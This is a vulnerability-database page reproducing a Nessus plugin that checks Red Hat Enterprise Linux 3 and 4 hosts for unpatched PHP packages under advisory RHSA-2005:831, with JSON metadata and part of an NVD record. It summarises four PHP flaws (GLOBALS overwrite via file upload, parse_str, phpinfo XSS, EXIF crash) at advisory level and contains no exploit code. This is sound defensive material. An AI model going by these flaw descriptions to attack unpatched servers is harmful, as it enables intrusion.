Search...

RHEL 3 / 4 : php (RHSA-2005:831)

2005-11-15T00:00:00

ID REDHAT-RHSA-2005-831.NASL
Type nessus
Reporter This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2005-11-15T00:00:00

Description

Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4.

This update has been rated as having moderate security impact by the Red Hat Security Response Team.

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.

A flaw was found in the way PHP registers global variables during a file upload request. A remote attacker could submit a carefully crafted multipart/form-data POST request that would overwrite the $GLOBALS array, altering expected script behavior, and possibly leading to the execution of arbitrary PHP commands. Please note that this vulnerability only affects installations which have register_globals enabled in the PHP configuration file, which is not a default or recommended option. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-3390 to this issue.

A flaw was found in the PHP parse_str() function. If a PHP script passes only one argument to the parse_str() function, and the script can be forced to abort execution during operation (for example due to the memory_limit setting), the register_globals may be enabled even if it is disabled in the PHP configuration file. This vulnerability only affects installations that have PHP scripts using the parse_str function in this way. (CVE-2005-3389)

A Cross-Site Scripting flaw was found in the phpinfo() function. If a victim can be tricked into following a malicious URL to a site with a page displaying the phpinfo() output, it may be possible to inject JavaScript or HTML content into the displayed page or steal data such as cookies. This vulnerability only affects installations which allow users to view the output of the phpinfo() function. As the phpinfo() function outputs a large amount of information about the current state of PHP, it should only be used during debugging or if protected by authentication. (CVE-2005-3388)

A denial of service flaw was found in the way PHP processes EXIF image data. It is possible for an attacker to cause PHP to crash by supplying carefully crafted EXIF image data. (CVE-2005-3353)

Users of PHP should upgrade to these updated packages, which contain backported patches that resolve these issues.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Red Hat Security Advisory RHSA-2005:831. The text 
# itself is copyright (C) Red Hat, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(20206);
  script_version("1.26");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");

  script_cve_id("CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390");
  script_bugtraq_id(15248, 15249, 15250);
  script_xref(name:"RHSA", value:"2005:831");

  script_name(english:"RHEL 3 / 4 : php (RHSA-2005:831)");
  script_summary(english:"Checks the rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Red Hat host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Updated PHP packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 3 and 4.

This update has been rated as having moderate security impact by the
Red Hat Security Response Team.

PHP is an HTML-embedded scripting language commonly used with the
Apache HTTP Web server.

A flaw was found in the way PHP registers global variables during a
file upload request. A remote attacker could submit a carefully
crafted multipart/form-data POST request that would overwrite the
$GLOBALS array, altering expected script behavior, and possibly
leading to the execution of arbitrary PHP commands. Please note that
this vulnerability only affects installations which have
register_globals enabled in the PHP configuration file, which is not a
default or recommended option. The Common Vulnerabilities and
Exposures project assigned the name CVE-2005-3390 to this issue.

A flaw was found in the PHP parse_str() function. If a PHP script
passes only one argument to the parse_str() function, and the script
can be forced to abort execution during operation (for example due to
the memory_limit setting), the register_globals may be enabled even if
it is disabled in the PHP configuration file. This vulnerability only
affects installations that have PHP scripts using the parse_str
function in this way. (CVE-2005-3389)

A Cross-Site Scripting flaw was found in the phpinfo() function. If a
victim can be tricked into following a malicious URL to a site with a
page displaying the phpinfo() output, it may be possible to inject
JavaScript or HTML content into the displayed page or steal data such
as cookies. This vulnerability only affects installations which allow
users to view the output of the phpinfo() function. As the phpinfo()
function outputs a large amount of information about the current state
of PHP, it should only be used during debugging or if protected by
authentication. (CVE-2005-3388)

A denial of service flaw was found in the way PHP processes EXIF image
data. It is possible for an attacker to cause PHP to crash by
supplying carefully crafted EXIF image data. (CVE-2005-3353)

Users of PHP should upgrade to these updated packages, which contain
backported patches that resolve these issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2005-3353"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2005-3388"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2005-3389"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2005-3390"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/errata/RHSA-2005:831"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-domxml");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-gd");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-imap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-mbstring");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-mysql");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-ncurses");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-odbc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-pear");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-pgsql");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-snmp");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:3");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2005/11/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/11/15");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Red Hat Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" &gt;!&lt; release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^(3|4)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 3.x / 4.x", "Red Hat " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$" && "s390" &gt;!&lt; cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);

yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo)) 
{
  rhsa = "RHSA-2005:831";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (!empty_or_null(yum_report))
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_HOLE,
      extra      : yum_report 
    );
    exit(0);
  }
  else
  {
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
}
else
{
  flag = 0;
  if (rpm_check(release:"RHEL3", reference:"php-4.3.2-26.ent")) flag++;
  if (rpm_check(release:"RHEL3", reference:"php-devel-4.3.2-26.ent")) flag++;
  if (rpm_check(release:"RHEL3", reference:"php-imap-4.3.2-26.ent")) flag++;
  if (rpm_check(release:"RHEL3", reference:"php-ldap-4.3.2-26.ent")) flag++;
  if (rpm_check(release:"RHEL3", reference:"php-mysql-4.3.2-26.ent")) flag++;
  if (rpm_check(release:"RHEL3", reference:"php-odbc-4.3.2-26.ent")) flag++;
  if (rpm_check(release:"RHEL3", reference:"php-pgsql-4.3.2-26.ent")) flag++;

  if (rpm_check(release:"RHEL4", reference:"php-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-devel-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-domxml-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-gd-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-imap-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-ldap-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-mbstring-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-mysql-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-ncurses-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-odbc-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-pear-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-pgsql-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-snmp-4.3.9-3.9")) flag++;
  if (rpm_check(release:"RHEL4", reference:"php-xmlrpc-4.3.9-3.9")) flag++;

  if (flag)
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_HOLE,
      extra      : rpm_report_get() + redhat_report_package_caveat()
    );
    exit(0);
  }
  else
  {
    tested = pkg_tests_get();
    if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else audit(AUDIT_PACKAGE_NOT_INSTALLED, "php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc");
  }
}

JSON Vulners Source

Initial Source

{"id": "REDHAT-RHSA-2005-831.NASL", "bulletinFamily": "scanner", "title": "RHEL 3 / 4 : php (RHSA-2005:831)", "description": "Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.", "published": "2005-11-15T00:00:00", "modified": "2005-11-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/20206", "reporter": "This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/cve-2005-3390", "https://access.redhat.com/security/cve/cve-2005-3353", "https://access.redhat.com/errata/RHSA-2005:831", "https://access.redhat.com/security/cve/cve-2005-3388", "https://access.redhat.com/security/cve/cve-2005-3389"], "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "type": "nessus", "lastseen": "2021-01-17T13:05:33", "edition": 27, "viewCount": 172, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390", "CVE-2005-3353"]}, {"type": "centos", "idList": ["CESA-2005:831", "CESA-2005:838-01", "CESA-2005:1110-001"]}, {"type": "redhat", "idList": ["RHSA-2005:838", "RHSA-2005:831"]}, {"type": "nessus", "idList": ["SUSE_SA_2005_069.NASL", "FEDORA_2020-FB144E7DE5.NASL", "PHP_4_4_1.NASL", "FEDORA_2005-1061.NASL", "CENTOS_RHSA-2005-831.NASL", "REDHAT-RHSA-2005-838.NASL", "FEDORA_2005-1062.NASL", "UBUNTU_USN-232-1.NASL", "GENTOO_GLSA-200511-08.NASL", "MANDRAKE_MDKSA-2005-213.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231065581", "OPENVAS:65581", "OPENVAS:55857", "OPENVAS:55777", "OPENVAS:57567", "OPENVAS:65242", "OPENVAS:136141256231065242", "OPENVAS:1361412562310877982"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14915", "SECURITYVULNS:VULN:1818"]}, {"type": "ubuntu", "idList": ["USN-232-1"]}, {"type": "suse", "idList": ["SUSE-SA:2005:069"]}, {"type": "gentoo", "idList": ["GLSA-200511-08"]}, {"type": "osvdb", "idList": ["OSVDB:20408", "OSVDB:21492", "OSVDB:20406", "OSVDB:20407"]}, {"type": "exploitdb", "idList": ["EDB-ID:26442", "EDB-ID:26443"]}, {"type": "fedora", "idList": ["FEDORA:87D4330CDA96"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1206-1:A74A0"]}], "modified": "2021-01-17T13:05:33", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-17T13:05:33", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:831. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20206);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"RHSA\", value:\"2005:831\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2005:831)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:831\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:831\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-26.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.9\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "20206", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-pear", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-domxml", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:34:56", "description": "The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when register_globals is enabled, allows remote attackers to modify the GLOBALS array and bypass security protections of PHP applications via a multipart/form-data POST request with a \"GLOBALS\" fileupload field.", "edition": 3, "cvss3": {}, "published": "2005-11-01T12:47:00", "title": "CVE-2005-3390", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3390"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2005-3390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3390", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", 